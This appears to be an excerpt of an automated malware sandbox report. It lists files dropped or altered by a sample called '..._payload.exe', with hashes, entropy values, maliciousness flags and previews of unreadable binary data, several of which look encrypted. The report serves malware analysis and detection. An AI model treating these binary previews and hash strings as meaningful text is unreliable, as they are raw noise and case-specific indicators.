                                                                                                      SSDEEP:1536:Pn/n8dd+zPDTDya34l7x66GLD71pOTlZzxgrKQujtgSVx9RfLLvQ:P0WDya34ld6F/71CZV4KQCgSffLc
                                                                                                      MD5:1A0FBE300EF5F52DBD0B346493DA35CC
                                                                                                      SHA1:5E90277396633ED9599D74D52A11809453F0F5AD
                                                                                                      SHA-256:7DA9A898A9F6EF982672F8E287F7348A869E118BAC49E77CBBDAF59AF2A609EE
                                                                                                      SHA-512:7A58722FDFA80B629F0389DFC6CCFBD269FCAD03EABA6A95040DE6CD3B64A015B55B3BBDF00D6102A7226144FBB540D127B2B28963A734BC4B8CD63C2B8DD9A7
                                                                                                      Malicious:false
                                                                                                      Preview:{"ramG...\.f.p....`kw.#..:..B..l...B..W.#.;..U*r=.Gq.`...-....F...t.DT...07.w...B#.j..._.......F...t@.gz....y..@.`..........S!x.+.". 9(.D.5...-..h...&..w.iv....g...,..g..t.s.g...;p.V?..d...ck.\qb.g.z.|~....,..=..z..<..g....c...W.j8.....aL.eo..'..eM..T.t..u..I%S..F.`.*4.3nD.Q.Uec.......Q.^..#|->.;sm...f..Zk.V.^u..4...B?.B..E4+X4K8....Nr..............O..`.m8.JN....O).I.(4`....pla.E....(.q......K.....e.TL...R../.;H/....(.,n..Z".QYK......A..g;"w....I....R5.qO.n.Tx%.}NC.{W.=.&...uK...Y.q.Q..u..+'..cP^.......6Xx...q....yx..x[;..Rz..Z'.....D.R`...K..2i.5"#......2..sL..".iw6..*.=...f....w..0...r...X%...\.5.".B.X....UJ(.B..Z K.f.{.>......{.d$'l...!..=.....R...[Z.."..QKa5.."a.."._.r?.6..26r95.I.,..k...N...qQq..E.&j.h.....@)....z(@PCstEg..([.o...VA.....e.C...k..a....CS(fN.i....1..%!.y..J4..d_O...d@BL.fB3....=..`b.d....2`.. .G......T..p8..g..9...,..}.....p..e.;.\]...b.k.*.j< .T{Cd.K...$[.....#....P.....@.>.<..q.....*.1...)M..bj|~0.N.V+:...

                                                                                                      C:\Users\user\AppData\Local\Temp\wctF411.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):74525
                                                                                                      Entropy (8bit):7.99775290490058
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:wuIjIpMqEa2jvVjun7MbEQT43eYw9X5tShqSzkleGD8WQSqzLGKPM:ujIpSqgbEFen0htkle7tzLk
                                                                                                      MD5:C9AFFA74C8132638E2214EF12E1511A2
                                                                                                      SHA1:E0572B0019D4B08CE1E04E081DC378ECF5AB83D7
                                                                                                      SHA-256:5D14F83FC88B9C5C06400F47459F7D64C91F2D2BA1182EE4B10DD86B8562B4E2
                                                                                                      SHA-512:CFED674F9A30DA63B0633A28DBAA61DB84BE66F2BA5BDEBCCA9E5C8115810A65C36C50DB21474B8F4968965DAE7AAB6B3DA1D6A177FE05839E04C4A3B01FDE31
                                                                                                      Malicious:false
                                                                                                      Preview:{"ram.....Q.8...m6..J...&...l.H..$.!.F...]..w...../h{F.......H......j ]...pp.....-=...f.a..E..P-.G.Mk.#.RN.d.P->.....,....|j}c/9.....}...N.I..s.fqi...+.6w.q.#.....e...\...EB.2u.Q..P>T."....M...;.S(..D.{nG.......".......E.N.,d[..lK..F'.w=..!....(U.q...5.^x......t.1<.....Ng....m./....0.j....r.x......\.. UrZ...b]J.......o;.SA.."T1....9$.M..%2._.3E. ..@y>. ...6...../m...RE....2FbH.J.0.....F;.GR....O...&....J..v.$9...&.`......m.J........!{.d.v.Ck.h{#.._...lG*^.J8..}...E..\.*.....m.6.E.`3.U.T.A.O.ET.............N....<..9.'..F..?z.O...~O.:.......V.}..a&.{...h..G....'}$89.2?...L..U.&3L.{XBO.[<.'.?....?....'k....h...y..Q<.......z`..:.W.w. ....7..J%5..^9N..Y..(.W..%..B.n..D.n..F.$..u..yC .x.o.......e?4.Q........,..."X...".?..&.3.iG).<0...jKU....#.k.Cw..m:..PB............#".S|.}k[..q.[9.B.6....l..)...$..M..]O&......@oh...+.JHK..Q.....?.O..J......H...... ..C.....L;{DI.....%XH..T..q......Z.O..W...L.....?.....R^...D.X..g....B.....;&..P.~......*.

                                                                                                      C:\Users\user\AppData\Local\Temp\wctF86A.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS-DOS executable
                                                                                                      Category:dropped
                                                                                                      Size (bytes):42164934
                                                                                                      Entropy (8bit):7.947664208211041
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:786432:MwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59N:pQcWxDMPnN+dk65gGUjku4vNjLjN
                                                                                                      MD5:51C72752E0D249F40F9109F6C135BAD0
                                                                                                      SHA1:F2D140BE91672A8BA77EEA7B03F32B4C306ABD79
                                                                                                      SHA-256:6207AD0AC7C0050B0121880CA8D99B0F72187406BC9526F7DBB8F038CFD2C240
                                                                                                      SHA-512:ED2519D59FABB5961C6D1EC66BBD179AA724409522908EB8CF6CD15210AEA8BFF3105EBE0A18E0147E5E821DEDC4B3337774477AEF039E2FA0CB77843D7F3307
                                                                                                      Malicious:true
                                                                                                      Preview:MZ....."..%........ .=.F.+.A.i|..b....9.P.]8jK.....5.D..p..B.m,.0.....1QR..2...).<y1.E...R.Y..p........R#.....C.-C..Rg..h...n.z..L..6{.hH..7N.C[....7y.%.'.U1...OX..n..A..."...\.1q...._0.G.{..w....X.k..............$X.*.%..8.$..{..QMA.NN..%....z..Eh<..;5%..P.K......H.....1+Veb.K.F6..h..7DME..0...j.t..Aq..Zm.w<......_f.$.7..?.na./^g.L>..`..Y...]..........B..as."B...r....`.%..qB..R..0.#W|.j.QA....?.+g.L),.v)..5..#?.....7......tY......@......a..R6g...}./<O..??...,...\s )...oIg|..7&.S.?:(X.8?T.IU.Tl.......6..M.c.B...|J0........[...%....X......o.b.Fd...%S.{.<Q|..tq.[.&2.[h.)..._]..j......-..e.O......8...".p.t.ka.s.\lK\NRiY....Nu.Hr..0.FL...o.\.6S.|H..DAf...K...]..p..X..)s?4.$0..\D6...'?i. ..*.V../c..j.71.h...8.N..N.w_.h.G..I..........'.V-a..!..&WCN..M..yk..^.]..........m"..g.T.-Pg. .tO.q...x5..bO.......O.=.0|...w....>....Z.|Z...$.g....6..ixKK.....~.EU..Y0....,)A*k52.owjj.............gl.2J0s..F.o]..RtR_...=..P=#0.VU.\+.. ..._.4`.@....0-.j...

                                                                                                      C:\Users\user\AppData\Local\Temp\wmsetup.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1031
                                                                                                      Entropy (8bit):7.819745065617026
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tt0qMzjziE+vAgmu/uZ1qGaqxXvfnIOpqftwrZOYcURTYqv6bD:sJiE+4jRZ1qGTffpqiZOSYqwD
                                                                                                      MD5:AA5B2FDE528B886E7DA33821E654A0B6
                                                                                                      SHA1:7293A645F32C4A35A4667EAF3D198291F485122E
                                                                                                      SHA-256:EE69F73414FA66CA33DEFB95EE2FFDDD94161F70A4278F152F588CD17D39090D
                                                                                                      SHA-512:53E76E7496F7CBCFE512556036A18B1733C599E74389E208290A949FFD90D58F3B146C3F713D4EED7F4F3ECE85DBBC408DD8B8D90EBF84BB55242065AFB86B16
                                                                                                      Malicious:false
                                                                                                      Preview:..[*W;...b..v....*j.. .3.'..J"~l./.6...9.z..d..-..y...6x%..Nh.|...T.P..0..d..8.6.'qh<...+T.~..h..ZPvU{x..>FC.^...&...3.d.@=..V.^`..@.x..KV...?c....h}U.k.:.......8.i.I.ZK}7....7.1.=w.efj.t;\.....<...W....*.....1.NW?...B....C.]....P..i.....G..v..i.]...~..nBe|W..5.:........sQ;1...lW...^q......!#..h...>.J.X.....K...}..68f6.|.B..O.....Gm2.}::..K.f-.+."....W.5...\..Zn.+.x..C......^b.Fr;....H....+n....R...6...,....w.t0..=........K....uw....W...+.z.Wq=.`.yH2..'.RS.].C5/..r.H.}j....nK.XOl%.5...%....M.U......g...j.\5....<.......M.E..l....Y...-8../T}7.\?..9.h.L*..I..N1e\p.....1^..^C..x.a_......".V.D.$.e..[..}w..q.O..S.0.c....m..X...O......Hx.oy...OFJ.*${.......e.aT_...........a...E......zr... .4[.*'..].........q.<o.#....\...m`.Y...ND.0=.M...A...A.J,m.T.}.....Q.c.O#.H.D1.L......;..3.a.E..;.7..KQ.....m..%dd.\[..L....(....+.YA.(...|........%..W....V.....*..}9...s..1......h........9..f..%....EY...-.|.5c..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698

                                                                                                      C:\Users\user\AppData\Local\Temp\{02662522-698F-45B5-959E-0EC7B36298AD}.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.96522097165237
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:t8OKlfFC5iBopuob3g47nyVA1/nyp41PYlJat9C/7Mz+rog6RRJ3XSR7vsolX1:UA5mYB3hnR1a6J9Pqr2CRbsoll
                                                                                                      MD5:FF7E7D9E95AC00974560A56E99EC2440
                                                                                                      SHA1:6A7573C847A5634B729A09628DA43998A3F3FA95
                                                                                                      SHA-256:2CAABE0652DFF40246540C4B11DBD2C078FA1C474267261444B22383F97AAD28
                                                                                                      SHA-512:043EE837D90BC33B6D4AF1D2CE1A500F553E8B184C58FAE5C53531B4F27B44A0B620A45CCA3FFF140101EE420AFD25A6E0987CB03571E7F499B51389221EFAE8
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG..x..#.I.L..;... .9I,.bEfl.....8..F.F./....L}?......H.'E,.....u...4...2.Su.....N..%....... h.y..z...._.Ir...*&.a.%.gcp..m....#.H]4..1..o..U.fi./...nxP.'.*r..7.g.QO../<.X..{...`.......i2.[.).-r.....'..m.8.n4...G.=.aW.....0..27+...71O./1=1=.,.p.?.7.>*.\.;.}.O...M....@].a.s..n....._fc...X..@...Q...*..e.]..g.B....\.......>.FB........e.!.e.5P........L.=..k25.O.H.z.q}I..v.`..nZs..7...d\{f.->..b.n.f....Z..B...,...X6.....~[U...B.$.F.0....@B.H..`W.~..#.g.&j.N,.c...lR..'F.;^..g._.>.Z:.a=7yn.(..N..."/..k.......rZ&...{.1.q{D. .T......x.+VL/..<..*4...W.5.......}..@....l.[...;.sA..z:..1..+F..V...Raj...|k.P..g..!..aovY...."?d..Q.`d^.)m.e.....{5.....dK..6.2.l....3.w...3....tZk...m..3.}..a...r..+.xN.m.7.U...k....yD....Z.x7..4.........:i.r.``*.x.....@(.l..i.}.M>$.8.g;CW,.`...gC...G...........U...........u..h.XP.F[8._.=..r.S$X.Q.....nT&....o=...;KK..Cm.zr..cQ.&Jff3..@.^."..f%.E.8aW!w.ilr....q.f..G7j.0.......EZ.....`.....%.+7.G@....G..].V...VLu.H..u

                                                                                                      C:\Users\user\AppData\Local\Temp\{139BFC28-947F-45CC-9DE4-AB0FCAEF6E9F}.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.97079851612105
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:lcOAGTLhHExJWClpRA6Z6rtRLIzlGD89HAONqz9OEHirwRK3gng9bXYiXipml:GtGH1ExbSzLUlGDDDzCgngRNXiq
                                                                                                      MD5:2FE1992B98832168C2425722298AF2B3
                                                                                                      SHA1:18603A830BD6D328D302E04A654C083224A10515
                                                                                                      SHA-256:4F3A48091480D481416B4EB28C2DC4DB837D24D080A7347C91A224CA8F22201A
                                                                                                      SHA-512:D0F9376C4F4E49FB35076BADA0CEDDA510F6F203A30DC9F33C8F9493820127E98D6C9EF085326B148F3F2D1B20BB55211BD81FC2BEDBAD8F7BD033308FFA9E59
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG..%}.......`..;..X~9`.b.;.su.@.%....=BL&.9sRg....X...H1..N.I...4...\..,.{%_.E..a-Z<...*0.._.. +..7..T..zD.&3../...H...C.7.c..|.5...J....X...=.;T` ....v0..>.q|..<X4.....L.JAH~dX..a.e..*2.....<..-...bjoP...U.P.A+.;.....,.&.....o.s...Gk.]...sVA.{3..7.#q..P.Pe..}.Y.Q.ml.K.}.{;k" ..L.B...S......a)0.oj..../x...>....$..h"(....M]........Ceb>....K......n|=%..?.j._.....+..p.NTr...I.k....q.6..4-.T...L...k;.....g..voj.&..^...sa..v.8.uL.f5^=..K.#..R.z....B.9.sVA....3{76T..]..Yu..T...^.,.v......F.3...OM..%....2.....w..Bm..F...c.}.*..C.AG......v]_..X..r.+...e...pS..gj....?..o;p.u..l.c.H.g...G....6@*.x.qx.....'...@.eP...}.).o..Y.3.)...8&........ .,.r.^ sg......r..,*.G]3..x...j..Q...N..4....U....j.XBb.Hbg|..^3.VM.?[...v..H.Mw....x5...s.B!...$...|.^b`..L..6*..._....&."..:.sw..D.q....'@~].pp.t!."0.G3...Ab.....3^.....#.W.q.^.M..]...LSA.Y.l..?..F.......]......G....o..[.z.F...9.i.."iR...Oh.;k...X...rJ..~n.N.n#g.PeS.5.E....7...{.+A6M.....|..O?..3..Th..E..P.

                                                                                                      C:\Users\user\AppData\Local\Temp\{5871238D-BEB9-464A-931F-701C8F0FFB10}.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.968798865368675
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:bfusW59sbJeqa/Daf+5AHvJJshxdQkES0YEax4ETpVA4blELi/v4Kz7mM0En2roh:bf1fJeZ/DaW5gxJshn3+axhbOL2v4Qaw
                                                                                                      MD5:940A6134C3005AA0901C902300A5B9AE
                                                                                                      SHA1:0F94B2234CA2451C9B75FF090CE35B5FCF0468C0
                                                                                                      SHA-256:B463F80443E570E52B38B48ABB7F34AAC3B0598A7DDC8A6C3F8EE3B1B299BF58
                                                                                                      SHA-512:652706134F228A4B07AC7AB5CE98FF45858F36D337F624283107BBCA76252C0D69201FD371607FCF8D1A1858FC10BAEC74CA2FAF569BE6EF693D4AFFFF3FF22B
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG....y..oM.U.MT.C..h$...7a...e....(v.0...(...C..qs.x.a.n.(.e.:..?..FjH.]....P.}.oj.w....L...2?.>W..pW)r...r.i.[.3.o.X.......X...^..4,._..]O...}.......1)...n8.Z..#W...........G...^..X..9..*.}d....L{...|P.+.g.d}oe..xd....D....r.c.....3.&......HR.dX.T#...".%...x.r..Zu...?.7.c.".T..'^.........G.z.R=sD.3../...d..!..-....'.Si<C......,*._..7.~..*.N]..#T..}G1....oE...>.....A...8h.......x.w....m...(.?.7t...u..'...R.7....F.q..HV..i.5_..nVM.T....Q.-^H.%2.R.z.;...PBU..lE.q|..M.......v.#..0..X._.....J.3jo..<....uG!.....8..Ze.m.33.EG2....i....+EJ.....\e.mX.#..5..17....*Ii...k.A.P...*.T.`.x+z....x...f..%_...Y_./...F.......}....A.[..`Y_8..o.A.?.q......O39~...C..e81..5e. ...|....'.6~V>`..sb.p..5u&w%h2..'.\:...n..\g.....q.0...0`..=!.v. 0[A...v;0u.8..8....o...9....."zf....&3..g.9.Z{.....r".l.N1...0.F..8./..*.....$r2....Q....6NzO....@G......QWB..-W...S..:..G...Ev...c..C...j.T...I*...M...P.5......z~...\h....z>3.*...(.K........~..0.R..h......p...^d..

                                                                                                      C:\Users\user\AppData\Local\Temp\{5F969F84-5F34-4AF8-8D36-D6D6A1668750}.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.972905770995576
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:WU+TuDpkmSlO6l2vGrrilGOnN1+DAoNyP0Sy1vauM6EKEev0cN6YL33mflueH5bZ:WUSSSdlbkFkAOo9Ee6pEe0cf2FZbFE2b
                                                                                                      MD5:61B7398F64670F01E2B0F6F794D8EBAF
                                                                                                      SHA1:E8289140331CFCF7BBA4282D0F9E59D2EA187251
                                                                                                      SHA-256:4443561282EEE5397F8F0F75D0EC9366BB4FC0DCD491E7B0ECC8ACA884D6CF06
                                                                                                      SHA-512:15E31A768DC80ACA8E398178426D63B17F742D1D68212CB3C17BF1625346E10DC10FB0AE7935A0BC87BDAD76A8167566DA57F041500A4A2863CE3A27D86889F8
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG....]...@<.${'...q..?.........{....n.[....7...Pr..7ML..."...X.!u.,...d..fN2r..d...>..I.&mfP.K.....;..w.z.p.Nr.B...#d.n.pt4.L.1.KH...)..Du3I.X....t.z..P...<1..p....b..~3....H|...v.....xMc.m...4.Lj..W...#..8...qhx..[.....y..m.$.{<D...4...d..e...?.|z.7...._.........0.].D...+.(.*4-..R...,.....=....}.....A..e....+.i.j?..O,..69;...5.d9&.....,...&.\y4Je5c9.....SF...ML.&%U.......&..=.v.&...8t....-|B1.f..2..M.d..:.@}..T....-.8u...>..T.DP.QBL..!V..P...b..%=.0...L..^......uU<L%...S.z..>...*80....f....S).F.(o7.......1...7......U.J...........Zo.k'.UXn..Y..83*....JX: ...+........#.a.K.R-.._.k.8.:..s...\..V...'..k....]^.F.././.....Cc...C`}R.C......."2V.......A7*.>Y.=+$p....n Rb...B..s)B..u.....X....uf..|hP.^Y.p..I.y.LuQ...%..{JZ.zU+..Y.....u......-8..8.j..n...?..M.!E..S_O_....,...K.6.g..r.q.a,..W..RE.l......m....>2.rl2H...Y9E.Z...|....z..Y..a1......r.qMV.OR0:............].k......_.w.X.>.w..M.Q.>...m*.....wm\.i%.J......Z..=.m@(2.S2t)........ .......Cu''."..J.G!...

                                                                                                      C:\Users\user\AppData\Local\bowsakkdestx.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1243
                                                                                                      Entropy (8bit):7.841911840574799
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:voK0Q0TOhOo2WDI9QOkwo833TWSHunsCQw7sSja4kQ4sFU1v6bD:gQ4o2Wc9Qm3HTWpntQw7sKz/OwD
                                                                                                      MD5:817929634A5EF9FBB79AF8DB46C63FEB
                                                                                                      SHA1:8E652758B34C08D04B35E098E3EDCE2F57453A04
                                                                                                      SHA-256:25E653F3E44E79EC1ABBB053F149EF812CDBED22B678E66F7D227A96F419D555
                                                                                                      SHA-512:F628EC695700D7FBB71FFEB2A1B33732E341B739186F7D1460493DB5DED3ABD27C661D0F114C3698178F6656655877EDC86A2771BF1D504702500D3330987687
                                                                                                      Malicious:false
                                                                                                      Preview:<!doc....n.....4.$.({./.$.UO......I7L.n..N......E..w*.a5"..p....I.l/.p.....W~...3-.v..M]h...M........?......b.u..\.....}+.g~...!...... .:k...+bt]h.u. m.0.3..B7..H...l..c.+._.o.FY{\\)..8+.....-W....&.VM..B*.mk5J*..>.U.....e..\.7p.......T.})Z,...fRF...{.{......7n.?|.C.C.:^....C..."a..}o.....%.?;HX|^/.DY8Ay..#.M..l;...._..TX..m..@z)<..G....E*...s-.39.....w=.,...#i.s...[...j.3.x...S.....}N..y.....1(.x1.D...s2O..F.......zl..:...Ne ..7.k,.H...........C..%.G...`VJ..~..X.<..'..?l.Sy.n]U...i..8.Fi..L....<].xx...........=.....n8...>....d.q-...&..|S.........f*.<.....x.<.N.[..`UU..B....n.5..W...8.x~[....|...g.....|..f.....X..T.Qb*..."..h...aTWq.Y....)s*...5Ty.k....9.a....5.]..+k...I..H.L....Zl...gO.........Pr...@;.5..0...(...q.]E.V....b.sM+.Y..jd..s..x.`..k&'..u..v............#x...v H.f...._].(.i...AXNQ+..?........K..?...b.....rQ.U~..=...2A...0.+.5E....vb4..m.)1..-z{M.#.A....t...b{.@ch..F=...B.@...;.....h..d...A L..^.&.8.3..c.]`$... .#....@...z..D..HL

                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):67138
                                                                                                      Entropy (8bit):7.997446879634443
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:D15HdxOHf0aXkB8nNBEYPqxVw01267mrmlgnN9:D15HDOMJ2NBEXV3267mrmWj
                                                                                                      MD5:7C8025470D0F4F887A5576C43CFBEF2D
                                                                                                      SHA1:0E9B1DB50F42604E3E9C9DF263204C75DC50251D
                                                                                                      SHA-256:BAF12A19FA2187B20D0CC0029B3CD70CD44C8CE1D6D32CE4EC9C0BB1657D11CC
                                                                                                      SHA-512:B37481B2DDD3374FA11B74F2EF1BF45F39ACFC712DA5B880478563A1E211108106E6D8A1C44D41585F8B53814D0AEF75C7D5596DD6BD481CBE9DDEA961F0068F
                                                                                                      Malicious:true
                                                                                                      Preview:0....[..Pd$..o^~.0.O_R.0...DKV.._./G.M..0.c.....d"..5S..n.Cw..._Vzs.<.6.;S.=.4`..x$V...M.Z...!Y_,d/.....Fz@....'j..X9.N$..._..b....<.`?z.`F..;..36'..6.]...=E.........{&..;.d...v....[..!....[...P.CRZ.?...s.".Q$......-.]..#.2|....?...)....F..H5..4....%.e;0N...u..c...%-Pp;Ws..wA..(..mv3.r"P.K9.1...L..^).X..(...L.9.5*..<T....&e.}.RK.Zx.....#P...;G..f<..A..uZ.l..R.wj..w.-.......^......sJ...3...B.H^.........5..y..A..........iR5../.ea.n@..s q+..;.....6.....VKi.....U.OB..c.....2.8s...."E%"jH@)`.}Z"f:..).I..i.0rj..^.:.N...oa.;.....6...H..16.X.;....&4.N...\..=......9.y.X|...T].......p.o..h...d...QA}.t..DW.L...V@..2..c..\.........g.{.....|.3..7...,w.$..|._.3:..y...O.]...O........(j......kd|......`X.+yL....]^.k...H....|.-.......<co..Y...Z.....3V...C..E..H.T..../"`.k....;vuI;.4U.m:...'....;qJ.f)1...6...<..`..1'(.a...b.I...M..?>y...m..g.e....1.$M.|.;E..}.K...h"...MKA....I?%...I.e*j./.@.......fAE]@......^.....<..e..\.....?P.}i..;.N=......L-.4v.6A....*.<...v

                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1071
                                                                                                      Entropy (8bit):7.779898972139336
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:yJT8QduVGkEs7DLFmg9yWrweahq7E12U6sML1xxbssKNX7Lnmezv6bD:yJdBGXQa37E1n1qxbsL7LnJzwD
                                                                                                      MD5:51D869B605379A88E5D1B69C47024260
                                                                                                      SHA1:F64486B0490393CD99FC6FC2FA6F8A871C1FE66B
                                                                                                      SHA-256:09E5EAE47BE25188B8C6CA6CDCB572A4798010A1078BCA9A8BABF4C5C638FB4F
                                                                                                      SHA-512:744EAF6C0A3A0EA11111C450D5F550A5B3176B3D04A6071C54086D3C956EF81A75B6E616024223CBF4A67904B66FE5A956542BC4D1019D814B0BBB47DB67E46C
                                                                                                      Malicious:false
                                                                                                      Preview:0...0..<....]NJ..F.n.A}8V.sg..V...D.s3r..Y....".......7....B.......W......+.K. .E.(.9.FNM2.......5..1....Q.........zKdN..8.C........Y8........w....bHU..a...T.-..e.......j...d.a9..k...d.s.>t.cX..x....2.E.QNj.H..P/....g~..!.V...V.h"......:9%C..I-bT.UJP..8.......l.@..K.{98<.N..c..>...9.../..i..]....Q...?.)..v(.e..p<..w...(..A....)...l]3....A...e..&,.x....N....c.'Y....j..6wE..blr..X..d........l+M.`,.... ..2.&..be.ZU.`.8[.6l.,1....-...a.u/iB.+x...f...n7w.a.i...z.......(.. ..ZFxi..t.......t.y>..7..D.K.....wQ4G.q~.J.D.m.R...T...{.`3y'.....5.:.UN4....W.......$..0$!.s.v0..i.fx..&...B.>......:2.%.[.....g^UH.</n...x.W.............J...k...m......0e>...n....v9....z......U.f^_..].G'Z... U*.b0a0.\_a..S]h8..H>.HF......qK.n......f...R5N.....x.1.Q...EA...p.v..a..Y....i1/..iC..DIa.J....o..k.e=.{..=...b....B......a.V.8kcR....,..B]/.{.;D.Q....&U.r=y.G....1>.,..V...Tc..|?.....`.~7..i.Kj."a.@X.86~..F...9.~J..mx..9.yW./.3.......c..o.V.d.$..u.U-.QhZRMDGn

                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):370
                                                                                                      Entropy (8bit):7.314166867333088
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:4q2gtoOBjEmQ5udpC7ixLSRvZB/X/+79YbOQ+FrfJzLw0n/bulpBzXXvV9Wcii9a:ggpjEmzTZSLpX2dQ6rfJ1/buzxv6ciik
                                                                                                      MD5:4BBFFD174379376BFF2AEAC3F2934773
                                                                                                      SHA1:B394D0D2B7D5E0CF33FC3D5888B717AB4AD91A97
                                                                                                      SHA-256:EB7E8E4FD29CB439371A6B49987C244205CCE22B7DB52ED2CF45AF32154636E6
                                                                                                      SHA-512:A49E99737B8024994E88749986C425C879C0A6458448A1BDF04B69B5354A3FAB8E25E4A4D6653FFAE3AC7E26A99CD5DA7A10287D905989AE5CA5ABED443F146B
                                                                                                      Malicious:false
                                                                                                      Preview:%PDFT.*.*..KxU...}...=.....k.....H,.....cX]...&..J.....`X...z,....l0..M.....,o.|...\..=..W3..p&....L]....5...~.w...>u.M.....`.b.F..&F.t}.F......a.".E..[../.....k.x. ...IY.5....4c...X......t..A....y%.......V..O.v.r. &S.!./.6|.l...j.f..!.P.v.Y.t..cD..)..Q`[C..WOu.&.w.:@.c.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):388
                                                                                                      Entropy (8bit):7.434071832157485
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:JMpyP3QwO21Yx5u9I0BSjX+hbXEinv6cii9a:yy/Qs1Yxk0jkEinv6bD
                                                                                                      MD5:50EBC06D88375553FA17AAAA2DEE8F07
                                                                                                      SHA1:4AC17CD4E4A671FB91BD4EC1F0759497BFA5D1B5
                                                                                                      SHA-256:3684ED434B0A18B12D92D04DE751BAE8EDCC013BEE784B8E6CBC4B7969C6C63E
                                                                                                      SHA-512:758B52E46AD88E8629EC403202116AE38C2E1F41B86531D2E178FC21EA2C502D5C3A70BE57CB45803C21F6AC7B68AA251AB3EBDBAE2D21FFCAA1493EF8EFC041
                                                                                                      Malicious:false
                                                                                                      Preview:%PDFTw...:Yk.F...G.]Xw.z.. ....:b....f..m.Q1y.y.x.A../.<.e...#..D..M.!.~..5u.?...-.!#.J.9.......t...UL.R3...j....`...C....[..s.n(Q.r.;.V.5..zS...(88.Sc..4B.....n...Q..(..`.I.l.D.|......%..b..19=L....x......A.....M.....7.3.'..)w.z$eW)..k.+.}........+'8.r..._........w.....0....y...s......6.P&.fhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):350
                                                                                                      Entropy (8bit):7.275454978959415
                                                                                                      Encrypted:false
